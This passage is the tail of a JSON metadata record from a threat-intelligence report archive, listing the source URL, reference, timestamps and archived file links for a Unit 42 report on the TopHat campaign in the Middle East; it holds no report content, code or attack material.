Source: https://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/"
	],
	"report_names": [
		"unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services"
	],
	"threat_actors": [],
	"ts_created_at": 1775434347,
	"ts_updated_at": 1775791196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d865976c95c90673e0517ca8f4ebfb0c386e593b.pdf",
		"text": "https://archive.orkl.eu/d865976c95c90673e0517ca8f4ebfb0c386e593b.txt",
		"img": "https://archive.orkl.eu/d865976c95c90673e0517ca8f4ebfb0c386e593b.jpg"
	}
}